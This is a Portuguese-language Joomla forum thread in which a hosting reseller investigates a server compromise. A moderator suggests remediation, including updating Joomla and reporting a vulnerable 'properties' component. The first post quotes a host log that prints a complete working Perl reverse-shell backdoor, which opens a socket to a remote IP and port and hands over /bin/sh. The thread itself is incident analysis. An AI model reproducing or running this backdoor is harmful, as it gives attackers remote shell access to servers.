Tentativa de invasão

Locked
User avatar
Seu Biu
Joomla! Apprentice
Joomla! Apprentice
Posts: 5
Joined: Mon Mar 02, 2009 8:03 pm
Location: Bezerros
Contact:

Tentativa de invasão

Post by Seu Biu » Wed May 05, 2010 5:08 pm

Saudações Caros amigos!

Eu estou com um grande Problema eu tenho uma revenda de hospedagem onde eu hospedo os meus clientes...
ontem o servidor deu problemas o host disse que uma conta de um cliente da minha revenda instalou um backdoor... e detonou todo o servidor... todos os sites ficaram fora e eles tiveram q formatar o servidor... ele me passou o log e me pediu um explicação minha! Eu afirmei que eu não havia instalado nada pois eu prezo pela segurança dos meus clientes e os meus sites... E fato esse meu cliente ele não tem acesso ao cpanel apenas eu tenho acesso! então como poderia eu mesmo instalar alguma coisa para me prejudicar ... sem lógica ... depois do stress eu fui investigar eu peguei o log e eu tinha recebido um email ontem do site no qual havia dado o problema... o meu cliente tentou acessar o painel administrativo e pediu a alteração de senha isso foi às 16:56 e o horário do problema com o servidor foi as 16:59 eh impossivel não ligar uma coisa com a outra pois os horários batem...

Segue o log

It does appear that a backdoor was installed in the server via /tmp:
root@server01 [/tmp]# strings back
#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
root@server01 [/tmp]# ls -al back
-rw-r--r-- 1 djturism djturism 541 May 4 16:59 back
It appears the kernel was last updated on Thursday, May 7th 2009:
root@server01 [/tmp]# uname -a
Linux server01.hostidc.info 2.6.18-128.1.10.el5PAE #1 SMP Thu May 7 11:14:31 EDT 2009
i686 i686 i386 GNU/Linux
In the recent hacks we have seen where backdoors were installed such as the one on your
server, it was because of the explanation given here:
http://www.cpanel.net/2009/09/cpanel-se ... ility.html
This appears to be the case for this server as you are using a very old kernel and the same
backdoor was installed. Since this isn't cPanel related you will need to contact a security
consultant/company to look over and you should reinstall the server as there is no telling
what files may be compromised on the box.

o djturism eh o meu cliente...

segue a mensagem do meu email.

Olá,

Uma requisição de alteração de senha foi recebida para sua conta Dj Turismo. Para alterar sua senha, você deve enviar este token para verificar se a requisição é legítima.

O token é e10..........

Clique na URL abaixo para informar o token e proceder com a alteração de sua senha.
segue o linkkk

........
:eek:
eu estou me reunindo com o meu cliente agora... e depois eu posto alguma coisa... eu gostaria de alguma informação mais detalhada!

Desde já obrigado pela comunidade...
Last edited by Seu Biu on Thu May 06, 2010 4:13 am, edited 1 time in total.
____
Para audaciosamente ir onde nenhum homem jamais esteve...

User avatar
Seu Biu
Joomla! Apprentice
Joomla! Apprentice
Posts: 5
Joined: Mon Mar 02, 2009 8:03 pm
Location: Bezerros
Contact:

Re: cpanel detectou backdoor em ação do joomla

Post by Seu Biu » Thu May 06, 2010 2:07 am

Olá Pessoal!

Eu estive com o meu cliente... o domínio que deu esse problema, eu não entrou no site ontem, é fato eu sei que não foi o meu cliente!

detalhes que eu não havia pensado! O admin esta com o meu email! E o user do meu cliente esta no email dele! então com isso tentaram pegar a minha senha do usuário bem conseguiram entrar, não tenho idéia como! isso às 16:56 pois foi o horário que eu recebi o email de pedido de alteração de senha... e o problema com o servidor foi às 16:59... se isso foi possível ao ponto de prejudicar todo o servidor... fato que eu pude constatar eu vi alguns dos sites hakeado, foram hakeados mesmos... isso mostra uma grande falha na segurança do servidor...
Agora o server jogou a culpa em mim! disseram que eu tinha pagar um multa de R$300,00 ou a minha conta seria anulada... (Salve SAnto Backup Semanal) eu resolvi adquirir um servidor dedicado pois agora eu sei onde estou pisando!

Mas ainda fica a dúvida como esses "cabas" conseguiram fazer isso?
entraram pelo site do meu cliente? ou foi apenas um "bode espiatório"?

Mais novidades eu postarei aqui!
____
Para audaciosamente ir onde nenhum homem jamais esteve...

User avatar
Seu Biu
Joomla! Apprentice
Joomla! Apprentice
Posts: 5
Joined: Mon Mar 02, 2009 8:03 pm
Location: Bezerros
Contact:

Re: cpanel detectou backdoor em ação do joomla

Post by Seu Biu » Thu May 06, 2010 2:57 am

Eu estive lendo o site joomla minas onde daniel reportou uma falha na segurança onde um invasor pode ter a senha do admin... mas isso em agosto de 2008 e a versão 1.5.0 ~1.5.5...
agora como padrão eu estava usando o login do admin como admin, agora não usarei mais! eu colocarei outro nome! ... mas essa falha ainda esta ativa na versão 1.5.14? pois eh a versão q estou usando!

Descobrindo mais coisas!
____
Para audaciosamente ir onde nenhum homem jamais esteve...

User avatar
Seu Biu
Joomla! Apprentice
Joomla! Apprentice
Posts: 5
Joined: Mon Mar 02, 2009 8:03 pm
Location: Bezerros
Contact:

Re: cpanel detectou backdoor em ação do joomla

Post by Seu Biu » Thu May 06, 2010 4:23 am

Olá Pessoal novamente... O nome do tópico não tem nada haver com o que aconteceu! por gentileza algum dos moderadores poderiam modificar o nome do tópico... se tiver como eu modificar me desculpem eu não achei!
____
Para audaciosamente ir onde nenhum homem jamais esteve...

User avatar
ronildo
Joomla! Virtuoso
Joomla! Virtuoso
Posts: 4022
Joined: Thu Aug 18, 2005 12:39 pm
Location: São Paulo - Brazil
Contact:

Re: Tentativa de invasão

Post by ronildo » Thu May 06, 2010 12:12 pm

Alterei o título já (pode ser esse ou quer sugerir algum outro?)

Com relação a versão, sim é sempre bom (é imprescindível) manter a última versão e hoje (06/05/2010) a última versão é a 1.5.17
Fica díficil saber onde foi que a invasão ocorreu, porém uma coisa eu acho estranha... não sei o que o hacker (leia-se gente desocupada) fez, porém normalmente o user do joomla não tem nada a ver com o user do linux... o seu cliente tinha acesso ssh ao servidor??

Qual foi a senha que o hacker usou do Joomla ou do ssh??
http://www.ronildo.com.br/blog/ pt-br | twitter: twitter.com/ronildo
http://forum.joomla.org/viewtopic.php?f=23&t=144443 - FAQ Joomla [pt]
Pessoal por favor não tiro dúvidas por e-mail nem mensagem privada, por favor não insistam.

User avatar
Seu Biu
Joomla! Apprentice
Joomla! Apprentice
Posts: 5
Joined: Mon Mar 02, 2009 8:03 pm
Location: Bezerros
Contact:

Re: Tentativa de invasão

Post by Seu Biu » Thu May 06, 2010 3:26 pm

Ronildo! Obrigado por ter alterado... o meu cliente não tem nem as senhas do cpanel. Portanto eu sou o único que tem controle da revenda... eu estive consultando os dados do google analytcis pois os o dito cujo me encontrou pelo google e ele é da Arábia Saudita... Eu fui pesquisar a forma que ele me encontrou ele usou um termo com o com properties no qual eh listado a as paginas e alguns erros na linha 72 e na linha 109 no controllers/searchajax.php eu encontrei esse site falando sobre uma falha na segurança do componente mas sem detalhes. http://securitycentre.othellotech.net/j ... properties

detalhe eu apenas instalei esse componente implementar um sistema de hotéis... o meu cliente tem uma agência de turismo com isso ele quiz colocar hotéis e poder fazer a reserva... eu pensei logo no properties! :(

agora sabemos por onde ele entrou!

o que eu deverei fazer em relação ao componente!

em relação a invasão eles tiveram que formatar o hd mesmo... eu acho que eles tendo acesso ao backend do joomla eles instalaram um backdoor e tendo os dados que eles querem as portas e o ip do servidor eles ... quero nem falar!
____
Para audaciosamente ir onde nenhum homem jamais esteve...

User avatar
ronildo
Joomla! Virtuoso
Joomla! Virtuoso
Posts: 4022
Joined: Thu Aug 18, 2005 12:39 pm
Location: São Paulo - Brazil
Contact:

Re: Tentativa de invasão

Post by ronildo » Thu May 06, 2010 4:44 pm

Entendido...
Por isso é muito importante na hora de escolhere os componentes consultar a lista de componentes com vulnerabildades.

Enfim... agora é remediar.
Coisas a se fazer, atualizar todas as versões de Joomla.
Verificar se o componente que você tava usando era a última versão fina e estável.

Caso o componente seja a última versão final, entrar em contato com o desenvolvedor e informar o que aconteceu, para que o mesmo tome providências de lançar um patch com a correção.

Também informar no docs.joomla.org onde tem a lista de componentes com vulnerabilidade o ocorrido.
http://www.ronildo.com.br/blog/ pt-br | twitter: twitter.com/ronildo
http://forum.joomla.org/viewtopic.php?f=23&t=144443 - FAQ Joomla [pt]
Pessoal por favor não tiro dúvidas por e-mail nem mensagem privada, por favor não insistam.


Locked

Return to “Segurança”